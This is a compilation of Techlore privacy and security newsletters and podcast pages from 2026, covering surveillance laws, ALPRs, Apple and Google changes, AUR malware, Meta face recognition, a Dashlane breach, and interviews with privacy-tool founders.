fighting it in court, we shouldn't put all our eggs in that basket, for self-explanatory reasons that come with trusting big tech companies in 2026. **\~ Story 3: The Flock Resistance with LAPD Walking Away** The LAPD let its contract with license plate surveillance company Flock expire, citing serious concerns over civil liberties and privacy. Flock's warrantless dragnet has made it the current face of corporate surveillance, especially after the Ring partnership backfired around the Super Bowl. **My take:** I don't know if that's how LAPD *really* feels, or if public pressure just made renewal untenable. Either way, this is something I'm celebrating—good job, LA! And I wanted to draw attention to something: the National Week of Action Against [ALPRs runs August 16–22](https://noalprs.com/), with over 100 participating cities. **GO!** You'll actually feel the camaraderie of being around people who think like you. See if your city is participating! --- ## This Week on Techlore 📺 I want to deeply apologize to those of you depending on these newsletters and content for the delays the last few weeks. For context: I've been in the middle of a major move and some inevitable hurdles came up, but as of right now I'm mostly settled into my new place 😁 We still got some fun stuff done back here: Last week I covered a tier list of password managers, which was a commonly requested list many of you wanted to see. This one was a lot of fun! [Password Manager Tier List 2026: Bitwarden, 1Password, KeePass, Proton Pass, LastPass, and MoreYour password manager is the most sensitive piece of software in your tech stack. It holds everything - your email, banking, work credentials, health records, crypto, and more. Here’s how 12 of the most popular ones actually stack up. Watch on Techlore.TV for an ad-free, surveillance-free viewing![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-3f8dd463-4024-41a9-8c60-e12aab6b077f.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260629-PW-MANAGER-TIER-LIST-thumbnail-v1-553419b6-cddb-43d0-9e43-5fbadce69269.jpg)](https://techlore.tech/password-manager-tier-list-2026-bitwarden-1password-keepass-proton-pass-lastpass-and-more/) And finally, I interviewed Vik Sharma from Cake Wallet on Techlore Talks to discuss digital assets, their privacy practices, Monero, and so much more! [Bank Freezes, Decentralization, and Financial Privacy with Cake Wallet’s Founder & CEO Vik SharmaTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-6ef747a0-4ee9-4c4a-8600-72f0f648466b.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260704-VIK-INTERVIEW-thumbnail2-fea8e09a-8cc3-4544-bd6e-91cadaf92df9.png)](https://techlore.tech/bank-freezes-decentralization-and-financial-privacy-with-cake-wallets-founder-ceo-vik-sharma/) Things should overall be returning to normal scheduling-wise, thank you everyone for your patience during this transition 🙏 --- ## Action Item ✅ 1. Check if you are impacted by the Secure Boot issue, and if you are get it patched 2. If you're in the US or EU, you have a lot to be contacting your reps about this week! **Until next week 🫡** #### This Week's Sources ****Highlight: EU Parliament Greenlights Chat Control** - - Techlore Guide Coming soon ****Story 1: The Microsoft Wave, Secure Boot Was Broken for a Decade, and That's Just the Start** - - - - - ****Story 2: The Age-Verification Wave — SCOTUS, Europe, and the KIDS Act** - - ****Story 3: The Flock Resistance** - - - ****The Defense Bulletin** Data Breaches - - - - - - - Threats - - - - - - - - - FOSS+ Updates - - - - - - - - - - - - - - - - - - - ### Bank Freezes, Decentralization, and Financial Privacy with Cake Wallet's Founder & CEO Vik Sharma URL: https://techlore.tech/bank-freezes-decentralization-and-financial-privacy-with-cake-wallets-founder-ceo-vik-sharma/ Last updated: 2026-07-14T16:30:58.000Z [From Darknet Pharmacy Order to 1+ Million Users: Building Cake Wallet (Vik Sharma Interview) | Techlore Talks | Episode 75Your bank can freeze your account, block your transfers, and demand explanations for how you spend your own money. Cake Wallet founder & CEO Vik Sharma learned this firsthand when trying to transfer $90 between his accounts. In this interview, he shares this story, along with the history of Cake…![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/favicon-636b619b27c8932b15adac78178e70ebdf1f2c3a33de896176872b88cb3a5e48-6647038a-27a2-419e-8ac9-7acb9e7878e1.ico)From Darknet Pharmacy Order to 1+ Million Users: Building Cake Wallet (Vik Sharma Interview)![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/MzdjYi5qcGc-a25a7500-3990-41ae-afad-8e5f48fc4d80.webp)](https://share.transistor.fm/s/76e957bc) Your bank can freeze your account, block your transfers, and demand explanations for how you spend your own money. Cake Wallet founder & CEO Vik Sharma learned this firsthand when trying to transfer $90 between his accounts. In this interview, he shares this story, along with the history of Cake Wallet, why financial privacy matters, the importance of decentralization, Bitcoin vs. Monero, silent payments, and more. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • Cake Wallet: • Monero by Cake Wallet: • Cupcake: ### The ULTIMATE Proton Hardening Guide (Part 1) URL: https://techlore.tech/the-ultimate-proton-hardening-guide-part-1/ Last updated: 2026-09-02T22:16:14.000Z Proton has solid privacy & security out of the box, but a few tweaks can take the safety of Proton Mail and your Proton account to the max: 2FA, Proton Sentinel, metadata stripping, tracker blocking, and more. Welcome to the ultimate Proton Hardening Guide Part 1! [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Password Manager Tier List 2026: Bitwarden, 1Password, KeePass, Proton Pass, LastPass, and More URL: https://techlore.tech/password-manager-tier-list-2026-bitwarden-1password-keepass-proton-pass-lastpass-and-more/ Last updated: 2026-07-06T18:16:36.000Z Your password manager is the most sensitive piece of software in your tech stack. It holds everything - your email, banking, work credentials, health records, crypto, and more. Here's how 12 of the most popular ones actually stack up. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Apple Quietly Downgrades Hide My Email, Plus Chrome Kills uBlock Origin & Google's IP Tracking URL: https://techlore.tech/apple-quietly-downgrades-hide-my-email-plus-chrome-kills-ublock-origin-googles-ip-tracking/ Last updated: 2026-06-24T16:59:57.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On Our Radar 🎯 **Apple is Downgrading Hide My Email, Making it Easier to Block** Apple left developers a note: in the coming weeks, the addresses generated by Hide My Email will move off `icloud.com` and onto a new `private.icloud.com` subdomain. This might sound like nothing...but in practice it's a meaningful downgrade. To be clear, this doesn't change the privacy or security of the service itself. It's still a forwarding alias, you're still trusting Apple, and it was never end-to-end encrypted. What changes is that the new subdomain makes it trivial for any app or website to look at your email and go, "that's a Hide My Email address," and refuse the signup. As I'm sure almost all of you experience, this is the typical pattern: You buy a VoIP number from MySudo or Google Voice and half your accounts reject it. You set up a SimpleLogin or Addy alias and sites tell you it's not a "real" email. Apple's change just hands websites an easy switch to do the same thing to the most mainstream aliasing tool out there. I think there's an important upstream fight beyond just encryption—it's the right to use any provider on equal footing. If a site accepts a Gmail address but blocks a SimpleLogin one, that's penalizing people for *not* using big tech. I'd love to see digital-rights pressure (this could live right next to the DMA and interoperability) that says a service can't reject you just because you didn't pick the inbox they wanted you to. And it's not only Apple. This week Google told advertisers it'll start using IP addresses for ad measurement and personalization across the EEA, UK, and Switzerland on or shortly after August 3. **What you can do:** If you rely on Hide My Email, don't wait to get blocked. Pair with an open-source aliasing service, they're also compatible with iCloud so you can stack tools on the same email. Many of them allow custom domains too so they live on a domain you control which is a bit harder to single out and block. For the Google change, decline non-essential cookies, review ad personalization in your Google account, and hide your IP with a VPN (or Tor) where it matters. --- ## Bits & Bytes 🤖 **\~ Story 1: Chrome's next update kills popular ad blockers for good** There's a technology behind every browser extension called Manifest. The old version (V2) is what powered ad blockers like uBlock Origin. Google's newer V3 is far more restrictive, and a fresh Chromium commit removes the last flag that let you keep running V2 extensions at all. **My take:** Google is mostly an ad company that also owns a browser and YouTube, who's *also* deciding the extension rules for the entire Chromium ecosystem is a real conflict of interest. Brave and Vivaldi have committed to keeping V2 alive, so we'll see how sustainable their workarounds are once the flag is gone. If ad blocking matters to you, this is the moment to look beyond Chrome. This is a great story to share with friends/family who are still using Chrome as well 😄 **\~ Story 2: Canada and the UK push sweeping new surveillance laws** Canada is forging ahead with a surveillance bill the EFF, Citizen Lab, the Canadian Civil Liberties Association, Signal, Apple, Google, and VPN providers all oppose. It pushes metadata retention, expands data-sharing with foreign governments, and creates a mechanism to demand encryption backdoors. Meanwhile, the UK wants to ban social media for under-16s and require ID or face scans to make an account. **My take:** When that many groups who usually agree on nothing line up against a bill, that tells you everything you need to know. And on the UK ban, banning kids from a platform instead of fixing the platform is like banning kids from parks because the parks are dangerous. The companies exploiting people through algorithms and data collection are the problem; make *them* accountable and safe instead of building an age-verification machine that's a privacy nightmare for everyone. If you're in Canada or the UK, contact your representatives! Every domino that falls here is bad globally. **\~ Story 3: The Arch Linux AUR malware mess gets worse** The Arch User Repository is one of the most powerful things about Arch, anyone can publish to it. That's also the risk. What was first reported as \~400 compromised packages turned out to be more than 1,500, and a second, more obfuscated malware wave landed just two days after the first. **My take:** This genuinely freaks me out, and it should freak you out if you use the AUR. This isn't unique to the AUR, it's the trade-off any time you install from a crowdsourced repo with no well-resourced gatekeeper in your corner. It's the same reason I don't treat a community Flatpak as a trustworthy way to run Signal on Linux: I don't enjoy trusting a random maintainer to ship my security updates. If you use the AUR, check the affected package lists in the sources and get more of your software from official developers where you can. --- ## This Week on Techlore 📺 We had a nice week off with some scheduled content to keep the feeds moving along, so thank you all for your patience! I'm excited to get back into the rhythm. I put out some takes on VPNs and my favorites (and least favorites) for the 2026 VPN tier list: [VPN Tier List 2026: Mullvad, IVPN, Obscura, Nord, Surfshark, and MoreYour VPN sees every site you visit, every app you use, and every search you make. Choosing the wrong one means trading your ISP’s surveillance for something potentially worse. Here’s our 3rd tier list of 2026! Watch on Techlore.TV for an ad-free, surveillance-free viewing experience![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-a8ea904b-c923-4eaf-b827-520c9fdf68da.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260610-VPN-TIER-LIST-thumbnail-2ea74b12-3221-4c85-8ad6-ef38afc11f9b.jpg)](https://techlore.tech/vpn-tie/) I did a first-look review of Loupe, a *super cool* new open source iOS app that tells you everything apps can see about you without granting any permissions. It's a GREAT tool to send to friends/family, and it's free to use: [Permission Not Required: The Open Source iOS App that Makes the Invisible Visible (Loupe Review)App tracking is mostly invisible, but now there’s a free & open source iOS app that changes that. Loupe shows you what any app on your iPhone can quietly collect without asking for a single permission. This video walks through what it reveals, why it matters, and what you can![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-381a197e-6795-4aa4-bec2-cb18054777f2.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260616-LOUPE-FIRST-LOOK-thumbnail-v2-54a2b666-b8eb-43bd-98c3-eff7b5a9d9fe.jpg)](https://techlore.tech/permission-not-required-the-open-source-ios-app-that-makes-the-invisible-visible-loupe-review/) I interviewed my good friend John Ozbay from Cryptee about the struggles they went through balancing E2EE sharing with the potential for CSAM, and how to balance these competing values. It was very enlightening! [Cryptee Launches End-to-End Encrypted Photo Sharing: Legal Risks, Preventing Abuse, and Their SolutionTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-a3fb1dd9-51b8-42a1-b652-90664fcb695e.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260620-JOHN-OZBAY-INTERVIEW-thumbnail-v4-127196a7-ec19-401b-8bfa-a6a4feba8920.jpg)](https://techlore.tech/cryptee-launches-end-to-end-encrypted-photo-sharing-legal-risks-preventing-abuse-and-their-solution/) Finally, a quick video on some Apple Maps alternatives in light of them rolling out ads: [Apple Maps Is Getting Ads, So What Should You Use Instead?After years of recommending Apple Maps as a private Google Maps alternative, that recommendation just got more complicated – Apple Maps is getting ads. Here are three alternatives worth knowing about. Watch on Techlore.TV for an ad-free, surveillance-free viewing experience![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-3b1ce212-ce8b-4f15-9147-d0144b7399ac.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/henry5-4352fa43-4d08-4fcb-badd-8aca9f30c9bf.png)](https://techlore.tech/apple-maps-is-getting-ads-so-what-should-you-use-instead/) --- ## Action Item ✅ If you lean on Hide My Email, don't wait for the blocks to start. And if you're in Texas, check the state breach disclosure in the sources: 3 million driver's licenses and passports were exposed. #### This Week's Sources ****Highlight: Apple Just Downgraded Its Privacy In a Key Way** - - - ****Story 1: Google Chrome's Next Update Kills Popular Ad Blockers** - ****Story 2: Canada and the UK Push Sweeping New Surveillance Laws** - - - ****Story 3: Russian Spam Is Now Plaguing the Arch Linux AUR** - ****The Defense Bulletin** ****Data Breaches** - - - - - - - - ****Threats** - - - - - - - - - ****FOSS+ Updates** - - - - - - - - - ### Apple Maps Is Getting Ads, So What Should You Use Instead? URL: https://techlore.tech/apple-maps-is-getting-ads-so-what-should-you-use-instead/ Last updated: 2026-06-22T23:50:44.000Z After years of recommending Apple Maps as a private Google Maps alternative, that recommendation just got more complicated – Apple Maps is getting ads. Here are three alternatives worth knowing about. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Cryptee Launches End-to-End Encrypted Photo Sharing: Legal Risks, Preventing Abuse, and Their Solution URL: https://techlore.tech/cryptee-launches-end-to-end-encrypted-photo-sharing-legal-risks-preventing-abuse-and-their-solution/ Last updated: 2026-08-19T15:01:48.000Z [End-to-End Encrypted Photo Sharing: How Cryptee Balances Privacy, Abuse Prevention, and Legal Risk | Techlore Talks | Episode 74End-to-end encrypted file sharing may sound simple, but for Cryptee, it took five years to ship. In this interview, Henry sits down with John Ozbay, founder and CEO of Cryptee, to talk through why: preventing CSAM, why client-side scanning doesn’t work, how Cryptee’s solution was designed to…![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/favicon-636b619b27c8932b15adac78178e70ebdf1f2c3a33de896176872b88cb3a5e48-563f68c9-ea50-423b-bf10-7c03b137dd0d.ico)End-to-End Encrypted Photo Sharing: How Cryptee Balances Privacy, Abuse Prevention, and Legal Risk![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/MzdjYi5qcGc-346c94aa-f275-4d9a-9459-b41043957bbc.webp)](https://share.transistor.fm/s/e2f4ecc1) End-to-end encrypted file sharing may sound simple, but for Cryptee, it took five years to ship. In this interview, Henry sits down with John Ozbay, founder and CEO of Cryptee, to talk through why: preventing CSAM, why client-side scanning doesn't work, how Cryptee's solution was designed to raise the barrier to mass spread without compromising encryption, and the broader philosophical question of where developer liability ends and moral responsibility begins. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • Cryptee: • Stop Chat Control: • Open Web Advocacy: • EDRI: ### Permission Not Required: The Open Source iOS App that Makes the Invisible Visible (Loupe Review) URL: https://techlore.tech/permission-not-required-the-open-source-ios-app-that-makes-the-invisible-visible-loupe-review/ Last updated: 2026-06-17T22:35:32.000Z App tracking is mostly invisible, but now there's a free & open source iOS app that changes that. Loupe shows you what any app on your iPhone can quietly collect without asking for a single permission. This video walks through what it reveals, why it matters, and what you can do about it. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### VPN Tier List 2026: Mullvad, IVPN, Obscura, Nord, Surfshark, and More URL: https://techlore.tech/vpn-tier-list-2026/ Last updated: 2026-06-29T16:37:45.000Z Your VPN sees every site you visit, every app you use, and every search you make. Choosing the wrong one means trading your ISP's surveillance for something potentially worse. Here's our 3rd tier list of 2026! [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Meta Hid Face-Recognition Code on 50M Phones, The UK's Device-Scanning Ultimatum & A Burner Phone Ban URL: https://techlore.tech/meta-hid-face-recognition-code-on-50m-phones-the-uks-device-scanning-ultimatum-a-burner-phone-ban/ Last updated: 2026-06-12T00:52:36.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) ⚠️ **No SR and no livestream next week.** We'll get some clips out and have other content lined up, so the feed won't go quiet, but the full SR and the Friday stream are back the week after. --- ## On Our Radar 🎯 **Meta Got Caught Hiding Face-Recognition Code on 50 Million Phones** Meta embedded an "unreleased" facial-recognition system, internally referenced as "nametag" into the dedicated Meta AI app, and shipped it to more than 50 million phones. This was built to convert faces captured by their Meta glasses into unique biometric signatures. Wired found that faces the system failed to match were cropped, indexed, and stored locally for later processing. Wired broke the story, and the day Wired went public, the "nametag" references were still sitting in several code libraries. But by Friday's release, they were gone. So the timeline is: 1. Implement invasive tech. 2. Get caught. 3. Delete evidence. 4. Deny. Meta's denying this...calling the feature "purely exploratory," with "no final decision" on what to do with it. The same spokesperson then said they couldn't answer questions about how it works because...and I quote..."the feature doesn't exist." They called the reporting "incredibly misleading and absolutely dishonest." But Meta declined to answer the ten questions Wired sent before publishing, so I don't think you get to ignore the questions and *then* be mad about the coverage. It's pretty straightforward: if a feature is truly experimental, you do not push it to 50 million people's devices without telling them. Either they knew exactly what they were doing and are walking it back, or they're planning to roll this out and lying about it. Both fit how Meta operates. **What you can do:** If someone in your life is eyeing those smart glasses or using Meta AI, talk to them about it. Not "you're bad for wanting them"...but this deserves an honest conversation about how much trust that hands a company that has earned none of it. There will be better options someday if this even becomes desirable technology. --- ## Bits & Bytes 🤖 **\~ Story 1: Microsoft Repos Weaponized Again to Push Malware to AI Users** For the second time in weeks, malicious packages tied to a compromised Microsoft GitHub account ran self-replicating credential stealers when an AI agent opened them. It was contained in 105 seconds on June 5, but it's the same account from the mid-May compromise, which raises real questions about whether credentials were ever fully rotated. **My take:** If you're early to new tech, using novel AI tooling, pulling fresh packages, living on the bleeding edge...you're carrying more attack surface than everyone else. This is going to keep happening and it's important to plan accordingly. If you touch any of these tools, dig into the sources to make sure you weren't impacted! **\~ Story 2: The UK's Ultimatum to Scan Every Device (And Signal's Answer)** The UK wants tech companies to switch on nudity-detection on phones and tablets, and companies must comply in three months or face legislation forcing it onto every phone in the country. Signal published a single-page response expressing the various reasons why this is a horrible idea that you can read in the sources below. **My take:** The problem is the UK keeps throwing surveillance at every problem and refusing to acknowledge the technical reality. Encryption *is* part of keeping kids safe...safe spaces, trusted contacts, with no one watching. Signal nailed their response: real child safety is funded education and social services, not invisible mandatory surveillance. **\~ Story 3: Two States, Two Directions on Privacy** **Good news:** Massachusetts unanimously passed (146–0) a privacy bill banning the sale of precise location data without explicit consent, covering biometrics, geolocation, and markers like religion, immigration status, and sexual orientation. **Bad news:** Texas's SB2420 forces Apple and Google to age-verify users at account creation, and it took effect June 4, with the update already going live on Apple devices. **My take:** Regulation alone won't fix privacy, and I'm not pretending it will. But without baseline laws, people have *nothing* to fall back on when something goes wrong. Massachusetts raises the floor, Texas dropped the floor. Laws are not the final solution, but they have *real*, *measurable* impacts on digital rights, and it's important to contact your politicians in light of these stories! **\~ Story 4: The FCC Wants to Kill Burner Phones** To fight robocalls, the FCC is floating a rule that would effectively ban burner phones and force U.S. consumers to hand even **more** data to telecoms *(some of the least trustworthy companies in tech)* The proceeding is open for public comment until June 25. **My take:** This is putting **more** power into the hands of people who are part of the problem. The actual lever is the data-broker industry that hands robocallers your number in the first place. Credit where due: the FCC at least *asked* about the privacy tradeoffs, which is a galaxy ahead of the UK's "these aren't concerns" posture. If you've got expertise, file a comment before June 25 using the sources below! --- ## This Week on Techlore 📺 This week we had a couple new pieces of content, the first is with the head of Firefox on Techlore Talks where I got to ask everything about Firefox VPN—the new (free) VPN in their browser: [Firefox VPN Explained: 50GB Free, No Logging, and How it Compares to Mozilla VPNTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-ac4e7b92-7c54-4f93-bf56-a5b68c183fa8.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260606-FIREFOX-VPN-INTERVIEW-thumbnail-v1-51dffaed-af1e-4b5c-9371-66d3682e834b.jpg)](https://techlore.tech/firefox-vpn-explained-50gb-free-no-logging-and-how-it-compares-to-mozilla-vpn/) I also put out a quick video over the weekend inspired by a Shark Tank pitch that infuriated me, which covers misleading privacy marketing used by many companies online. This is a great one to share with loved ones! [How to Tell if an App Is Actually Secure (Most Aren’t)Most apps claiming to be “private and secure” are using language that sounds meaningful but commits to almost nothing. I broke this down after watching a Shark Tank segment on Qeepsake, a baby journal app that calls itself “absolutely private and secure” because it has an SSL certificate. That’s![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-c7c46be0-ad17-46c0-8fdf-8bb6626cee28.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/---ABSOLUTELY-PRIVATE-----4--9b987cb3-ea7a-4b58-a791-c9268c815e1a.png)](https://techlore.tech/how-to-tell-if-an-app-is-actually-secure-most-arent/) ⚠️ **And Remember: No SR and no livestream next week!** --- ## Action Item ✅ Two open comment windows are worth calling out: - The **FCC's burner-phone proposal** is accepting public comments through **June 25** - And if you're in **Texas**, the SB2420 age-verification rollout is exactly the kind of local change worth contacting your representatives about. **☎️ Contact your reps!** #### This Week's Sources ****Highlight: Meta Secretly Added Face-Recognition Code to Millions of Phones** - - ****Story 1: Microsoft Repos Weaponized to Push Password-Stealing Malware to Claude & Gemini Users** - - ****Story 2: UK Ultimatum to Scan All Content on All Devices (Signal Responds)** - - ****Story 3: Good News / Bad News — Two States, Two Directions on Privacy** - - ****Story 4: FCC Wants to Kill Burner Phones by Forcing Telecoms to Collect Everyone's ID** - - ****The Defense Bulletin** ****Data Breaches** - - - - - - - - ****Threats** - - - - - - - - - - - - - ****FOSS+ Updates** - - - - - - - - - - - - - - ### How to Tell if an App Is Actually Secure (Most Aren't) URL: https://techlore.tech/how-to-tell-if-an-app-is-actually-secure-most-arent/ Last updated: 2026-06-07T03:25:28.000Z Most apps claiming to be "private and secure" are using language that sounds meaningful but commits to almost nothing. I broke this down after watching a Shark Tank segment on Qeepsake, a baby journal app that calls itself "absolutely private and secure" because it has an SSL certificate. That's the same protection every website has. This is an industry-wide playbook. Here's how to read it. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Firefox VPN Explained: 50GB Free, No Logging, and How it Compares to Mozilla VPN URL: https://techlore.tech/firefox-vpn-explained-50gb-free-no-logging-and-how-it-compares-to-mozilla-vpn/ Last updated: 2026-06-06T17:20:05.000Z [The Business Model Behind Mozilla’s Free VPN with Ajit Varma (Head of Firefox Interview) | Techlore Talks | Episode 73Firefox now has a free built-in VPN with 50GB of bandwidth per month. In this interview, Henry sits down with the Head of Firefox at Mozilla, to break down exactly how it works, what Mozilla can and can’t see, the difference between Firefox VPN and Mozilla VPN, and why no other major browser is…![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/favicon-636b619b27c8932b15adac78178e70ebdf1f2c3a33de896176872b88cb3a5e48-9b175b02-f010-449a-98dd-aebf75735202.ico)The Business Model Behind Mozilla's Free VPN with Ajit Varma (Head of Firefox Interview)![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/MzdjYi5qcGc-c2846201-64ef-479c-b9b2-ee941985274c.webp)](https://share.transistor.fm/s/9e2947b5) Firefox now has a free built-in VPN with 50GB of bandwidth per month. In this interview, Henry sits down with Ajit Varma, Head of Firefox at Mozilla, to break down exactly how it works, what Mozilla can and can't see, the difference between Firefox VPN and Mozilla VPN, and why no other major browser is likely to follow Mozilla's lead on this. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • Firefox VPN: • Mozilla VPN: ### Dashlane Confirms Hackers Stole Password Vaults, Pentagon Location Tracking, and Hackers Trick Meta's AI URL: https://techlore.tech/dashlane-confirms-hackers-stole-password-vaults-pentagon-location-tracking-and-hackers-trick-metas-ai/ Last updated: 2026-06-04T22:07:10.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On Our Radar 🎯 **Dashlane Got Breached, And It's Being Way Too Quiet** A password manager getting compromised is a headline **nobody** wants to read, but we got it this week: Dashlane confirmed that hackers obtained at least a dozen, likely around 20, encrypted customer vaults during a recent attack. There are a lot of asterisks on this so far, but it's already starting to feel *a lot* like the [LastPass data breach from a few years ago...](https://en.wikipedia.org/wiki/2022%5FLastPass%5Fdata%5Fbreach) Here's what we actually know, and it's not much so far. Dashlane says hackers brute-forced their way past the company's two-factor authentication and got into roughly 20 customer accounts, then downloaded copies of those encrypted vaults. The company claims there's no evidence its own systems were compromised, but it hasn't explained how the attackers defeated 2FA, hasn't said whether a ransom was demanded, and didn't respond to requests for comment. I'm left wondering how vaults were stolen without the attackers compromising their systems...? The (somewhat) reassuring part is that these were encrypted vaults, meaning those user's data *should* be encrypted. But LastPass taught us that "encrypted" isn't a magic word. Attackers who steal an encrypted vault can sit and brute-force it for as long as it takes, and people who used weak master passwords in the LastPass breach have seen millions of dollars drained from crypto wallets years after the original breach—and those vaults are still being attacked today. So the concern isn't really today, it's the slow attack against whoever in that group of 20 had a weak master password. The other takeaway: Dashlane **needs** to step up. This is the most sensitive software a person can use, it's literal access to your entire life. Even if the investigation is genuinely ongoing, there's no excuse for not reaching out directly to the affected customers with specifics of what's currently known and not known. **What you can do:** No matter which password manager you use, make sure your master password is long, strong, and unique. Use a security key if you're able to for phishing resistance. If you're a Dashlane customer, watch for direct communication from them if they decide to step up. I'm expecting some more updates on this one! --- ## Bits & Bytes 🤖 **\~ Story 1: The Pentagon Admits US Troops Were Tracked With Commercial Location Data** Senator Ron Wyden revealed the US Department of Defense confirmed that adversaries surveilled military personnel using commercial location data, the same kind harvested by app trackers and SDKs, aggregated by data brokers, and sold to anyone willing to pay. Wyden called the data broker industry a **national security threat.** **My take:** You can't build a surveillance economy that only watches "regular" people! The same data broker pipeline that tracks you also tracks soldiers, politicians, and everyone else. For once, "national security threat" is being applied to something that genuinely is one, and the fix isn't exemptions for the powerful; it's actual privacy protections for everyone. We're now in the world where even those in power can't escape these issues, and the sooner we guarantee basic digital rights—the sooner we can finally start getting ahead of this. **\~ Story 2: Europe Is Accelerating Its Move Away From Big Tech** Europe is doing what it can to move away from big tech companies with Euro Office! This means they are dropping Google in favor of 